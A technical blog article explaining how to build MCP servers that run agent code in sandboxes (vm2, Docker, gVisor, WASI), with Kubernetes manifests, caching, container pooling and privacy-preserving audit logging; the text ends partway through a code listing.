Code Execution with MCP: 98.7% Token Reduction Through Efficient Agent Architecture

Bryan Thompson - MCP Quality Architect & Security Researcher

On November 4, 2025, Anthropic published an engineering post that changes how we should think about MCP server architecture: code execution as a first-class capability that reduces token consumption while extending what agents can do. The post's example, in which token usage fell from roughly 150,000 to 2,000 tokens (a 98.7% reduction), points to a significant shift in how production AI infrastructure is designed.

For teams building production MCP servers, this insight raises critical questions: How do we implement secure code execution environments? What are the quality engineering implications? How does this change our approach to MCP server design? Let's explore what code execution with MCP means for enterprise infrastructure.

The Token Consumption Crisis

Traditional MCP architectures face a fundamental scaling problem: as agents interact with more tools and data sources, token consumption grows with every tool definition, data transformation, and intermediate result, all of which occupy limited context window space.

Traditional MCP Token Overhead

Full Tool Schema Loading

Every available tool must be described in the context window, consuming thousands of tokens even when unused

Complete Dataset Transmission

Large datasets must be sent in their entirety to the model for processing and filtering

Intermediate Result Bloat

Every transformation step accumulates in the conversation history, degrading performance

Sequential Processing Latency

Complex operations require multiple model round-trips, each incurring API latency

In production environments, these constraints translate to real costs: higher API bills, slower response times, and extra architectural complexity to work around context window limits. The traditional approach of exposing every capability as a separate tool doesn't scale.
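
To make the overhead concrete, here is a rough back-of-the-envelope estimator. It assumes about four characters per token, which is only a common rule of thumb and not how any particular tokenizer behaves. The `ToolDefinition` shape and the sample catalog are hypothetical.

```typescript
// Rough estimate of the context cost of loading every tool schema up front.
// ASSUMPTION: ~4 characters per token is a heuristic, not a real tokenizer.
interface ToolDefinition {
  name: string;
  description: string;
  inputSchema: Record<string, unknown>;
}

const CHARS_PER_TOKEN = 4;

function estimateTokens(text: string): number {
  return Math.ceil(text.length / CHARS_PER_TOKEN);
}

function estimateSchemaOverhead(tools: ToolDefinition[]): number {
  // Each definition is serialized into the prompt whether or not it is used.
  return tools.reduce(
    (sum, tool) => sum + estimateTokens(JSON.stringify(tool)),
    0,
  );
}

// Hypothetical catalog: 100 tools with similar-sized schemas.
const sampleTools: ToolDefinition[] = Array.from({ length: 100 }, (_, i) => ({
  name: `tool_${i}`,
  description: "Reads a record from a data source and returns selected fields.",
  inputSchema: {
    type: "object",
    properties: { id: { type: "string" }, fields: { type: "array" } },
    required: ["id"],
  },
}));

const overheadTokens = estimateSchemaOverhead(sampleTools);
console.log(`Estimated schema overhead: ${overheadTokens} tokens`);
```

The absolute number matters less than the shape: the cost scales with the size of the catalog, not with the number of tools a given request actually uses.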

Code Execution Paradigm Shift

Code execution with MCP inverts the traditional architecture: instead of exposing hundreds of specialized tools, you provide a secure execution environment where agents can dynamically discover, filter, and compose capabilities programmatically.

Code Execution Efficiency Gains

98.7% Token Reduction

Anthropic's demonstration shows dramatic token savings through in-execution filtering and processing

Dynamic Tool Discovery

Agents can query available capabilities on-demand rather than loading all schemas upfront

In-Execution Data Filtering

Process large datasets in the execution environment, returning only relevant results to the model

Reduced Latency

Time to first token improves dramatically with fewer API round-trips

This is more than an optimization: it is a rethinking of MCP architecture that makes practical the workflows that token constraints previously ruled out.

TYPESCRIPT

// Traditional MCP pattern: high token overhead.
// Every tool schema is loaded into the context window up front.
const tools = [
  { name: "list_files", schema: { /* ... */ }, description: "..." },
  { name: "read_file", schema: { /* ... */ }, description: "..." },
  { name: "search_files", schema: { /* ... */ }, description: "..." },
  // ... 100 more tool definitions
];

// Code execution pattern: dynamic discovery.
// The agent queries capabilities on demand.
// executeCode is assumed to run each snippet as a function body in the sandbox.
const availableTools = await executeCode(`
  // List available filesystem operations
  const fs = require('fs');
  return Object.keys(fs).filter(k => typeof fs[k] === 'function');
`);

// The agent processes data in the execution environment
const results = await executeCode(`
  const fs = require('fs');
  const files = fs.readdirSync('./data');

  // Filter in the execution environment
  const relevantFiles = files
    .filter(f => f.includes('2025'))
    // String concatenation avoids nesting a template literal inside this one
    .map(f => ({ name: f, size: fs.statSync('./data/' + f).size }))
    .filter(f => f.size < 1000000);

  // Return only processed results
  return relevantFiles;
`);

// Token savings: only final results are transmitted to the model
// Original approach: 10,000+ tokens for all file metadata
// Code execution: 200 tokens for filtered results
// Reduction: 98%
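
The percentages quoted in this article all come from the same simple arithmetic, sketched below. The 150,000 and 2,000 token figures are the ones given in Anthropic's post for its example workflow; the other two pairs are the illustrative comparisons used in this article's own listings.

```typescript
// Percentage reduction in tokens, rounded to one decimal place.
function tokenReductionPercent(before: number, after: number): number {
  if (before <= 0) throw new RangeError("before must be positive");
  return Math.round(((before - after) / before) * 1000) / 10;
}

console.log(tokenReductionPercent(150_000, 2_000)); // 98.7
console.log(tokenReductionPercent(10_000, 200)); // 98
console.log(tokenReductionPercent(5_000, 200)); // 96
```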

Architecture and Implementation Patterns

Implementing code execution with MCP requires careful architectural decisions about execution environments, capability exposure, and state management.

Execution Environment Design

The execution environment is the foundation of this architecture. It must balance capability exposure with security isolation, performance with resource constraints.

TYPESCRIPT

// MCP server with a code execution environment
import fs from 'node:fs';
import { Server } from '@modelcontextprotocol/sdk/server/index.js';
import { StdioServerTransport } from '@modelcontextprotocol/sdk/server/stdio.js';
import { CallToolRequestSchema } from '@modelcontextprotocol/sdk/types.js';
import { VM } from 'vm2'; // In-process JavaScript sandbox

// sanitizePath, isPathAllowed, createMonitoredConsole, createMCPOperations,
// and logExecution are helper methods elided from this listing.
class CodeExecutionMCPServer {
  private server: Server;
  private vm: VM;

  constructor() {
    this.server = new Server({
      name: 'code-execution-mcp',
      version: '1.0.0',
    }, {
      capabilities: {
        tools: {}, // Expose code execution tool
        resources: {} // Expose filesystem resources
      }
    });

    // Create isolated execution environment
    this.vm = new VM({
      timeout: 5000, // 5 second limit (vm2 applies it to synchronous code only)
      sandbox: {
        // Controlled API exposure
        fs: this.createSecureFilesystemAPI(),
        console: this.createMonitoredConsole(),
        // Custom MCP operations
        mcp: this.createMCPOperations()
      }
    });

    this.setupHandlers();
  }

  private createSecureFilesystemAPI() {
    // Sandboxed filesystem access
    return {
      readdirSync: (path: string) => {
        // Path traversal protection
        const sanitized = this.sanitizePath(path);
        // Allowlist verification
        if (!this.isPathAllowed(sanitized)) {
          throw new Error('Path access denied');
        }
        return fs.readdirSync(sanitized);
      },
      // ... other secured filesystem operations
    };
  }

  private setupHandlers() {
    // Handle code execution requests
    this.server.setRequestHandler(CallToolRequestSchema,
      async (request) => {
        if (request.params.name === 'execute_code') {
          const code = request.params.arguments?.code as string;
          const result = await this.executeSecurely(code);
          return {
            content: [{ type: 'text', text: JSON.stringify(result) }]
          };
        }
        // Reject anything other than the single exposed tool
        throw new Error(`Unknown tool: ${request.params.name}`);
      }
    );
  }

  private async executeSecurely(code: string): Promise<unknown> {
    try {
      // Execute in isolated VM with timeout protection
      const result = this.vm.run(code);

      // Log execution for audit trail
      this.logExecution(code, result);

      return result;
    } catch (error) {
      // Handle execution errors safely
      return { error: error instanceof Error ? error.message : String(error) };
    }
  }

  // Connect over stdio once the handlers are registered
  async start(): Promise<void> {
    await this.server.connect(new StdioServerTransport());
  }
}

export const server = new CodeExecutionMCPServer();
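
The listing above calls `sanitizePath` and `isPathAllowed` without showing them. As a minimal sketch of what those two steps could look like when combined, the hypothetical `resolveWithinRoot` helper below normalizes a POSIX-style path against a sandbox root and rejects anything that lands outside it. It is pure string handling so it runs anywhere; a real Node implementation would more likely build on `path.resolve` and also resolve symlinks, which this sketch does not attempt.

```typescript
// Resolve a requested POSIX-style path against a sandbox root and reject
// anything that escapes it. HYPOTHETICAL helper, not part of any SDK.
function resolveWithinRoot(root: string, requested: string): string {
  const rootParts = root.split("/").filter(Boolean);
  // Absolute requests are resolved from "/"; relative ones from the root.
  const parts = requested.startsWith("/") ? [] : [...rootParts];

  for (const segment of requested.split("/")) {
    if (segment === "" || segment === ".") continue;
    if (segment === "..") {
      parts.pop(); // popping at "/" is a no-op, as on a real filesystem
    } else {
      parts.push(segment);
    }
  }

  // Compare whole segments so "/srv/sandbox-evil" does not pass as "/srv/sandbox".
  const inside =
    parts.length >= rootParts.length &&
    rootParts.every((part, i) => parts[i] === part);
  if (!inside) {
    throw new Error("Path access denied");
  }
  return "/" + parts.join("/");
}

console.log(resolveWithinRoot("/srv/sandbox", "./data/report.json"));
// "/srv/sandbox/data/report.json"
```

Comparing path segments rather than raw string prefixes is the design choice worth noting: a plain `startsWith` check would accept a sibling directory whose name merely begins with the root's name.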

Dynamic Tool Discovery Pattern

Rather than exposing hundreds of tools, expose a capability discovery mechanism that agents can query programmatically.

TYPESCRIPT

// Agent discovers capabilities dynamically
const discoverTools = async () => {
  // String.raw keeps the regex backslashes intact inside the template literal
  const code = String.raw`
    // Query available filesystem operations
    const fsOps = Object.keys(mcp.fs)
      .filter(k => typeof mcp.fs[k] === 'function')
      .map(k => ({
        name: k,
        // Picks up a doc comment only if it sits inside the function source
        description: mcp.fs[k].toString().match(/\/\*\*([^*]|\*(?!\/))*\*\//)?.[0]
      }));

    // Query available database operations
    const dbOps = Object.keys(mcp.db)
      .filter(k => typeof mcp.db[k] === 'function')
      .map(k => ({ name: k, signature: mcp.db[k].toString() }));

    return { filesystem: fsOps, database: dbOps };
  `;

  return await executeCode(code);
};

// Agent uses discovered capabilities
const capabilities = await discoverTools();

// Only load schemas for tools actually needed
const readFileSchema = capabilities.filesystem
  .find(op => op.name === 'readFile');

// Execute operation in code environment
const fileContents = await executeCode(`
  return mcp.fs.readFile('./config.json', 'utf8');
`);

// Token comparison:
// Traditional: 5000 tokens (all filesystem tool schemas)
// Dynamic discovery: 200 tokens (query + specific operation)
// Reduction: 96%
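
Introspecting function source is one way to discover capabilities. Another, loosely modeled on the idea of a tool search with an adjustable level of detail, is to keep an explicit registry inside the execution environment. The sketch below is a hypothetical illustration: `ToolRegistry`, `DetailLevel`, and the registered tools are invented names, not part of the MCP SDK.

```typescript
// HYPOTHETICAL in-sandbox registry: names and shapes are illustrative only.
type DetailLevel = "name" | "summary" | "full";

interface RegisteredTool {
  name: string;
  description: string;
  inputSchema: Record<string, unknown>;
}

class ToolRegistry {
  private tools = new Map<string, RegisteredTool>();

  register(tool: RegisteredTool): void {
    this.tools.set(tool.name, tool);
  }

  // Return only as much detail as the agent asks for, so the model pays
  // tokens for full schemas only on the tools it intends to call.
  search(query: string, detail: DetailLevel = "name"): Array<Partial<RegisteredTool>> {
    const needle = query.toLowerCase();
    const matches = Array.from(this.tools.values()).filter(
      (t) =>
        t.name.toLowerCase().includes(needle) ||
        t.description.toLowerCase().includes(needle),
    );
    return matches.map((t) => {
      if (detail === "name") return { name: t.name };
      if (detail === "summary") return { name: t.name, description: t.description };
      return { ...t };
    });
  }
}

const registry = new ToolRegistry();
registry.register({
  name: "read_file",
  description: "Read a file from the sandbox",
  inputSchema: { type: "object", properties: { path: { type: "string" } } },
});
registry.register({
  name: "list_files",
  description: "List files in a directory",
  inputSchema: { type: "object", properties: { dir: { type: "string" } } },
});
registry.register({
  name: "db_query",
  description: "Run a read-only SQL query",
  inputSchema: { type: "object", properties: { sql: { type: "string" } } },
});

console.log(registry.search("file")); // names only
console.log(registry.search("read_file", "full")); // full schema for one tool
```

An agent would typically search by name first, then request the full schema only for the one or two tools it decides to call.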

Security and Sandboxing Requirements

Anthropic correctly emphasizes that code execution requires "secure execution environment with appropriate sandboxing." This isn't optional—it's the foundation of production-ready code execution with MCP.

Critical Security Requirements

Process Isolation

Code execution must occur in isolated processes with strict resource limits (CPU, memory, network)

Filesystem Sandboxing

Path traversal protection, allowlisting, and permission enforcement prevent unauthorized access

Network Restrictions

Outbound network access must be controlled through explicit allowlists or completely disabled

Execution Time Limits

Strict timeout enforcement prevents infinite loops and resource exhaustion attacks

Audit Logging

Complete execution audit trail for security investigation and compliance requirements
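
One way to keep these requirements enforceable is to express them as a single policy object that is validated before any code runs. The sketch below is an assumption-laden illustration: the `ExecutionPolicy` shape and function names are hypothetical, and the default values simply mirror the 5 second, 256 MB, network-disabled settings used elsewhere in this article.

```typescript
// HYPOTHETICAL policy shape for a sandboxed execution; field names are illustrative.
interface ExecutionPolicy {
  timeoutMs: number;
  maxMemoryMb: number;
  // An empty list means outbound network access is fully disabled.
  allowedHosts: string[];
}

const defaultPolicy: ExecutionPolicy = {
  timeoutMs: 5000,
  maxMemoryMb: 256,
  allowedHosts: [],
};

// Exact match or subdomain match against the allowlist; deny by default.
function isHostAllowed(policy: ExecutionPolicy, host: string): boolean {
  const normalized = host.trim().toLowerCase().replace(/\.$/, "");
  return policy.allowedHosts.some((allowed) => {
    const a = allowed.toLowerCase();
    return normalized === a || normalized.endsWith("." + a);
  });
}

// Collect configuration problems instead of failing on the first one.
function validatePolicy(policy: ExecutionPolicy): string[] {
  const problems: string[] = [];
  if (!(policy.timeoutMs > 0)) problems.push("timeoutMs must be positive");
  if (!(policy.maxMemoryMb > 0)) problems.push("maxMemoryMb must be positive");
  if (policy.allowedHosts.some((h) => h.includes("*"))) {
    problems.push("wildcards are not supported; list hosts explicitly");
  }
  return problems;
}

const dbOnly: ExecutionPolicy = { ...defaultPolicy, allowedHosts: ["db.internal"] };
console.log(isHostAllowed(defaultPolicy, "example.com")); // false
console.log(isHostAllowed(dbOnly, "replica.db.internal")); // true
console.log(isHostAllowed(dbOnly, "evildb.internal")); // false
```

A check like this belongs in application code as a second line of defense; the actual enforcement still has to come from the sandbox or the network layer.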

Sandboxing Implementation Options

TYPESCRIPT

// Option 1: vm2 for in-process JavaScript isolation (local experiments only)
import { VM } from 'vm2';

const vm = new VM({
  timeout: 5000,
  sandbox: { /* controlled API */ },
  eval: false,
  wasm: false
});

// Option 2: Docker containers (production)
import Docker from 'dockerode';

const docker = new Docker();

async function executeInContainer(code: string) {
  const container = await docker.createContainer({
    Image: 'node:18-alpine',
    Cmd: ['node', '-e', code],
    NetworkDisabled: true,
    AttachStdout: true,
    AttachStderr: true,
    // Resource limits belong under HostConfig in the Docker Engine API
    HostConfig: {
      Memory: 256 * 1024 * 1024, // 256MB limit
      MemorySwap: 256 * 1024 * 1024,
      CpuShares: 512
    }
  });

  await container.start();

  // Kill the container if it exceeds the 5 second budget
  const timeout = setTimeout(() => {
    container.kill().catch(() => { /* container already exited */ });
  }, 5000);

  // Without a TTY, Docker multiplexes stdout and stderr into one framed stream;
  // production code should split it with docker.modem.demuxStream.
  const stream = await container.logs({
    stdout: true,
    stderr: true,
    follow: true
  });

  let output = '';
  stream.on('data', (chunk: Buffer) => { output += chunk.toString(); });

  await container.wait();
  clearTimeout(timeout);
  await container.remove();

  return output;
}

// Option 3: gVisor for strong kernel isolation (enterprise)
// Use the gVisor runtime with Docker for kernel-level isolation
async function createGVisorContainer(code: string) {
  return docker.createContainer({
    Image: 'code-execution-env',
    Cmd: ['node', '-e', code],
    HostConfig: { Runtime: 'runsc' }, // gVisor runtime
    // ... security constraints
  });
}

// Option 4: WebAssembly sandboxing
// Compile code to WASM and run it under WASI with a restricted filesystem view.
// Note: the Node.js docs warn that node:wasi does not provide the comprehensive
// filesystem security guarantees of some dedicated WASI runtimes.
import { WASI } from 'node:wasi';
import { readFileSync } from 'node:fs';

const wasi = new WASI({
  version: 'preview1', // required on recent Node.js releases
  args: process.argv,
  env: {},
  preopens: {
    '/sandbox': '/tmp/sandbox' // Limited filesystem access
  }
});

const wasm = await WebAssembly.compile(
  readFileSync('./code-execution.wasm')
);

const instance = await WebAssembly.instantiate(wasm, {
  wasi_snapshot_preview1: wasi.wasiImport
});

wasi.start(instance);

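For production deployments, Docker containers running under gVisor offer a strong balance of security, performance, and operational simplicity. vm2 should be limited to local experiments with trusted code: the library has a history of sandbox-escape vulnerabilities, and its maintainers announced in 2023 that the project was being discontinued.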

Production Deployment Strategies

Deploying code execution capabilities in production requires infrastructure planning beyond simple sandboxing. You need container orchestration, resource management, and monitoring infrastructure.

Kubernetes Deployment Architecture

YAML

# Kubernetes deployment for code execution MCP server
apiVersion: apps/v1
kind: Deployment
metadata:
  name: code-execution-mcp
spec:
  replicas: 3
  selector:
    matchLabels:
      app: code-execution-mcp
  template:
    metadata:
      labels:
        app: code-execution-mcp
    spec:
      # Security context for pod
      securityContext:
        runAsNonRoot: true
        runAsUser: 1000
        fsGroup: 1000
        seccompProfile:
          type: RuntimeDefault

      containers:
      - name: mcp-server
        image: code-execution-mcp:latest

        # Resource limits critical for security
        resources:
          requests:
            memory: "512Mi"
            cpu: "500m"
          limits:
            memory: "1Gi"
            cpu: "1000m"

        # Security hardening
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          capabilities:
            drop: ["ALL"]

        # Environment configuration
        env:
        - name: EXECUTION_TIMEOUT
          value: "5000"
        - name: MAX_MEMORY_MB
          value: "256"
        - name: ENABLE_NETWORK
          value: "false"

        # Health checks
        livenessProbe:
          httpGet:
            path: /health
            port: 8080
          initialDelaySeconds: 30
          periodSeconds: 10

        readinessProbe:
          httpGet:
            path: /ready
            port: 8080
          initialDelaySeconds: 5
          periodSeconds: 5

        # Logging configuration
        volumeMounts:
        - name: logs
          mountPath: /var/log/mcp

      # Ephemeral volume for logs
      volumes:
      - name: logs
        emptyDir: {}

---
# Service for MCP server
apiVersion: v1
kind: Service
metadata:
  name: code-execution-mcp
spec:
  selector:
    app: code-execution-mcp
  ports:
  - port: 8080
    targetPort: 8080

---
# Network policy restricting outbound access
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: code-execution-isolation
spec:
  podSelector:
    matchLabels:
      app: code-execution-mcp
  policyTypes:
  - Ingress
  - Egress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          role: mcp-client
    ports:
    - protocol: TCP
      port: 8080
  egress:
  - to:
    - podSelector:
        matchLabels:
          role: database
    ports:
    - protocol: TCP
      port: 5432
  # No other egress allowed - code execution is isolated.
  # This also blocks DNS (port 53); add an egress rule for it if the pod
  # resolves the database by service name.

Resource Management and Auto-Scaling

YAML

# Horizontal Pod Autoscaler for code execution workloads
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: code-execution-mcp-hpa
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: code-execution-mcp
  minReplicas: 3
  maxReplicas: 20
  metrics:
  # Scale on CPU utilization
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 70
  # Scale on memory utilization
  - type: Resource
    resource:
      name: memory
      target:
        type: Utilization
        averageUtilization: 80
  # Scale on custom metrics (execution queue depth)
  - type: Pods
    pods:
      metric:
        name: execution_queue_depth
      target:
        type: AverageValue
        averageValue: "10"
  behavior:
    scaleDown:
      stabilizationWindowSeconds: 300
      policies:
      - type: Percent
        value: 50
        periodSeconds: 60
    scaleUp:
      stabilizationWindowSeconds: 60
      policies:
      - type: Percent
        value: 100
        periodSeconds: 30

---
# Pod Disruption Budget for high availability
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
  name: code-execution-mcp-pdb
spec:
  minAvailable: 2
  selector:
    matchLabels:
      app: code-execution-mcp
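
To reason about how the autoscaler above will react, it helps to work through the core replica calculation that Kubernetes documents for the HPA. The sketch below applies that ratio formula and clamps the result to the `minReplicas` and `maxReplicas` from the manifest. It is a simplification: the real controller also applies a tolerance band, the stabilization windows, and the scaling policies, and when several metrics are configured it takes the largest result.

```typescript
// Core HPA calculation as documented by Kubernetes:
//   desired = ceil(currentReplicas * currentMetric / targetMetric)
// then clamped to [minReplicas, maxReplicas]. Defaults match the manifest above.
function desiredReplicas(
  currentReplicas: number,
  currentMetric: number,
  targetMetric: number,
  minReplicas = 3,
  maxReplicas = 20,
): number {
  const raw = Math.ceil(currentReplicas * (currentMetric / targetMetric));
  return Math.min(maxReplicas, Math.max(minReplicas, raw));
}

// CPU at 90% against the 70% target with 3 replicas
console.log(desiredReplicas(3, 90, 70)); // 4

// Queue depth of 25 per pod against a target of 10 with 4 replicas
console.log(desiredReplicas(4, 25, 10)); // 10

// A large spike is capped at maxReplicas
console.log(desiredReplicas(10, 300, 70)); // 20
```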

Performance Optimization Techniques

While code execution dramatically reduces token consumption, execution overhead can impact latency. Smart caching and execution planning minimize this impact.

Result Caching Strategy

TYPESCRIPT

// Caching for code execution results
import { createHash } from 'node:crypto';
import Redis from 'ioredis';
import { VM } from 'vm2';

// Any counter client that exposes increment(); this interface is illustrative
interface Metrics {
  increment(name: string): void;
}

class ExecutionCache {
  private redis: Redis;
  private ttl: number = 3600; // 1 hour default

  constructor(private metrics: Metrics) {
    this.redis = new Redis({
      host: process.env.REDIS_HOST,
      port: parseInt(process.env.REDIS_PORT || '6379', 10),
      enableReadyCheck: true,
      maxRetriesPerRequest: 3
    });
  }

  private generateCacheKey(code: string, context: any): string {
    // Hash code + context for cache key
    const content = JSON.stringify({ code, context });
    return `exec:${createHash('sha256').update(content).digest('hex')}`;
  }

  async getCached(code: string, context: any): Promise<any | null> {
    const key = this.generateCacheKey(code, context);
    const cached = await this.redis.get(key);

    // Compare against null so cached falsy results (0, false, "") still count as hits
    if (cached !== null) {
      // Track cache hit metrics
      this.metrics.increment('execution.cache.hit');
      return JSON.parse(cached);
    }

    this.metrics.increment('execution.cache.miss');
    return null;
  }

  async setCached(
    code: string,
    context: any,
    result: any,
    ttl?: number
  ): Promise<void> {
    const key = this.generateCacheKey(code, context);
    await this.redis.setex(
      key,
      ttl || this.ttl,
      JSON.stringify(result)
    );
  }

  async invalidatePattern(pattern: string): Promise<void> {
    // Keys are SHA-256 digests, so the pattern matches the digest text, not the
    // original code. SCAN is used instead of KEYS, which blocks Redis on large keyspaces.
    const stream = this.redis.scanStream({ match: `exec:*${pattern}*`, count: 100 });
    for await (const keys of stream) {
      if ((keys as string[]).length > 0) {
        await this.redis.del(...(keys as string[]));
      }
    }
  }
}

// Usage in MCP server
class CodeExecutionMCPServer {
  constructor(private cache: ExecutionCache, private vm: VM) {}

  async executeCode(code: string, context: any): Promise<any> {
    // Check cache first (a cached null result is treated as a miss)
    const cached = await this.cache.getCached(code, context);
    if (cached !== null) {
      return cached;
    }

    // Execute if not cached
    const result = await this.vm.run(code);

    // Determine cacheable based on code analysis
    if (this.isCacheable(code)) {
      await this.cache.setCached(code, context, result);
    }

    return result;
  }

  private isCacheable(code: string): boolean {
    // Don't cache code with time-sensitive operations.
    // This is a heuristic: code that reads files or databases can also go stale.
    const nonCacheablePatterns = [
      /new Date\(/,
      /Math\.random\(/,
      /Date\.now\(/,
      /performance\.now\(/
    ];

    return !nonCacheablePatterns.some(pattern => pattern.test(code));
  }
}
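
One subtlety in hashing `JSON.stringify({ code, context })` is that `JSON.stringify` preserves property insertion order, so two logically identical contexts built in a different order produce different cache keys. A minimal sketch of a key-order-independent serializer follows; `stableStringify` is a hypothetical helper, and it only handles plain JSON-like data (a `Date`, for example, would serialize as an empty object).

```typescript
// Serialize a JSON-like value with object keys sorted at every level, so that
// logically equal contexts produce identical strings (and identical cache keys).
function stableStringify(value: unknown): string {
  if (value === null || typeof value !== "object") {
    // undefined and functions have no JSON form; treat them as null
    return JSON.stringify(value) ?? "null";
  }
  if (Array.isArray(value)) {
    return "[" + value.map((item) => stableStringify(item)).join(",") + "]";
  }
  const record = value as Record<string, unknown>;
  const entries = Object.keys(record)
    .sort()
    .filter((key) => record[key] !== undefined)
    .map((key) => JSON.stringify(key) + ":" + stableStringify(record[key]));
  return "{" + entries.join(",") + "}";
}

const keyA = stableStringify({ user: "u1", filters: { year: 2025, type: "json" } });
const keyB = stableStringify({ filters: { type: "json", year: 2025 }, user: "u1" });

console.log(keyA === keyB); // true
console.log(JSON.stringify({ x: 1, y: 2 }) === JSON.stringify({ y: 2, x: 1 })); // false
```

Feeding the output of a function like this into the SHA-256 hash, instead of raw `JSON.stringify`, should raise the hit rate whenever callers assemble their context objects in varying order.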

Connection Pooling for Container Execution

TYPESCRIPT

// Container pool for faster execution startup
import Docker from 'dockerode';

class ContainerPool {
  private pool: Docker.Container[];
  private available: Docker.Container[];
  private poolSize: number = 10;

  constructor(private docker: Docker) {
    this.pool = [];
    this.available = [];
  }

  async initialize(): Promise<void> {
    // Pre-warm container pool
    const containers = await Promise.all(
      Array(this.poolSize).fill(null).map(() =>
        this.createContainer()
      )
    );

    this.pool = containers;
    this.available = [...containers];
  }

  private async createContainer(): Promise<Docker.Container> {
    return await this.docker.createContainer({
      Image: 'code-execution-env:latest',
      NetworkDisabled: true,
      Tty: false,
      OpenStdin: true,
      StdinOnce: false,
      // Resource limits belong under HostConfig in the Docker Engine API
      HostConfig: { Memory: 256 * 1024 * 1024 },
      // Keep container alive for reuse
      Cmd: ['node', '--eval', 'process.stdin.resume()']
    });
  }

  async acquire(): Promise<Docker.Container> {
    // Wait for available container (simple polling)
    while (this.available.length === 0) {
      await new Promise(resolve => setTimeout(resolve, 100));
    }

    const container = this.available.shift()!;

    // Ensure container is running
    const info = await container.inspect();
    if (!info.State.Running) {
      await container.start();
    }

    return container;
  }

  async release(container: Docker.Container): Promise<void> {
    // Reset container state
    await this.cleanupContainer(container);

    // Return to available pool
    this.available.push(container);
  }

  private async cleanupContainer(
    container: Docker.Container
  ): Promise<void> {
    // Remove any created files. container.exec() only creates the exec
    // instance; it has to be started for the command to run.
    const exec = await container.exec({
      Cmd: ['sh', '-c', 'rm -rf /tmp/*'],
      AttachStdout: false,
      AttachStderr: false
    });
    await exec.start({});

    // Clear process state
    // (implementation depends on execution model)
  }

  async destroy(): Promise<void> {
    // Cleanup all containers
    await Promise.all(
      this.pool.map(async (container) => {
        try {
          await container.stop();
          await container.remove();
        } catch (error) {
          // Already stopped/removed
        }
      })
    );
  }
}

// Usage reduces cold start latency from ~2s to ~50ms
const docker = new Docker();
const pool = new ContainerPool(docker);
await pool.initialize();

async function executeWithPool(code: string): Promise<any> {
  const container = await pool.acquire();
  try {
    // executeInContainer here is an assumed variant that runs code inside an
    // already-running container (for example via container.exec)
    const result = await executeInContainer(container, code);
    return result;
  } finally {
    await pool.release(container);
  }
}

Enterprise Implementation Guidelines

Enterprise deployments require additional considerations around compliance, audit logging, and data privacy that go beyond basic sandboxing.

Privacy-Preserving Execution

Anthropic highlights that code execution supports "privacy-preserving operations by keeping intermediate results in execution environment" and "automatically tokenizing sensitive data." This is critical for enterprise compliance.

TYPESCRIPT

// Privacy-preserving data processing in the execution environment
import { v4 as uuidv4 } from 'uuid';

// Runs code in the sandbox with the given variables in scope (implementation elided)
type SandboxExecute = (
  code: string,
  context: Record<string, unknown>
) => Promise<unknown>;

class PrivacyPreservingExecutor {
  constructor(private execute: SandboxExecute) {}

  async processCustomerData(customerIds: string[]): Promise<unknown> {
    // Execute data processing in secure environment
    const code = `
      const { tokenize } = mcp.privacy;

      // Load customer data in execution environment
      // (customerIds is supplied through the execution context below)
      const customers = await mcp.db.query(
        'SELECT * FROM customers WHERE id = ANY($1)',
        [customerIds]
      );

      // Process without exposing PII to model
      const insights = customers.map(customer => {
        // Tokenize PII fields
        const tokenized = {
          customerId: tokenize(customer.id),
          email: tokenize(customer.email),
          // Aggregate, non-PII insights only
          purchaseCount: customer.orders.length,
          // Guard against customers with no orders (avoids dividing by zero)
          avgOrderValue: customer.orders.length === 0 ? 0 : customer.orders.reduce(
            (sum, order) => sum + order.total, 0
          ) / customer.orders.length,
          lastPurchase: customer.orders[0]?.date
        };

        return tokenized;
      });

      // Return aggregated insights only
      const count = insights.length || 1;
      return {
        totalCustomers: insights.length,
        avgPurchaseCount: insights.reduce(
          (sum, i) => sum + i.purchaseCount, 0
        ) / count,
        avgOrderValue: insights.reduce(
          (sum, i) => sum + i.avgOrderValue, 0
        ) / count
      };
    `;

    // Execute code - PII never transmitted to model
    return await this.execute(code, { customerIds });
  }
}

// Audit logging for compliance
// (db, hashCode, summarizeResult, and formatComplianceReport are elided)
class AuditLogger {
  async logExecution(execution: {
    code: string;
    user: string;
    timestamp: Date;
    durationMs: number;
    dataAccessed: string[];
    result: any;
  }): Promise<void> {
    // Comprehensive audit trail
    await this.db.query(`
      INSERT INTO execution_audit_log (
        execution_id,
        user_id,
        timestamp,
        code_hash,
        data_accessed,
        execution_duration_ms,
        result_summary
      ) VALUES ($1, $2, $3, $4, $5, $6, $7)
    `, [
      uuidv4(),
      execution.user,
      execution.timestamp,
      this.hashCode(execution.code),
      JSON.stringify(execution.dataAccessed),
      execution.durationMs,
      this.summarizeResult(execution.result)
    ]);
  }

  // Compliance reporting
  async generateComplianceReport(
    startDate: Date,
    endDate: Date
  ): Promise<ComplianceReport> {
    // Query audit log for compliance reporting.
    // Assumes PostgreSQL with data_accessed stored as a jsonb array.
    const executions = await this.db.query(`
      SELECT
        l.user_id,
        COUNT(DISTINCT l.execution_id) AS execution_count,
        COUNT(DISTINCT t.accessed_table) AS unique_tables_accessed
      FROM execution_audit_log AS l
      LEFT JOIN LATERAL jsonb_array_elements_text(l.data_accessed)
        AS t(accessed_table) ON true
      WHERE l.timestamp BETWEEN $1 AND $2
      GROUP BY l.user_id
    `, [startDate, endDate]);

    return this.formatComplianceReport(executions);
  }
}
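
The listing above relies on a `tokenize` function without defining it. As a minimal sketch of the idea, the hypothetical `PiiTokenizer` below swaps sensitive values for opaque placeholders such as `[EMAIL_1]` and can restore them later inside the execution environment. It keeps its mapping in memory only; a production version would need persistence, access control, and a policy on who may detokenize.

```typescript
// HYPOTHETICAL in-sandbox tokenizer: swaps sensitive values for opaque
// placeholders before results reach the model, and restores them afterwards.
class PiiTokenizer {
  private valueToToken = new Map<string, string>();
  private tokenToValue = new Map<string, string>();

  tokenize(kind: string, value: string): string {
    const key = `${kind}:${value}`;
    const existing = this.valueToToken.get(key);
    if (existing !== undefined) return existing; // same value, same token

    const token = `[${kind.toUpperCase()}_${this.valueToToken.size + 1}]`;
    this.valueToToken.set(key, token);
    this.tokenToValue.set(token, value);
    return token;
  }

  // Replace every known placeholder in a string with its original value.
  detokenize(text: string): string {
    let restored = text;
    this.tokenToValue.forEach((value, token) => {
      restored = restored.split(token).join(value);
    });
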